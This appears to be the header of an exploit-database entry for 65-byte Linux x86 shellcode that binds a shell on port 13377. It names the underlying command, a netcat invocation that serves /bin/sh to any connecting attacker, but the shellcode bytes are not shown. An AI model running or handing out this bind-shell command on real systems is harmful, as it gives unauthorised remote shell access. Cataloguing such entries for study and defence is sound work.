# Exploit Title: Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) # Date: Jan 12, 2021 # Exploit Author: ac3 # Version: Linux x86 # Tested on: Linux x86
## linux x86 nc -lvve/bin/sh -p13377 shellcode ## This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker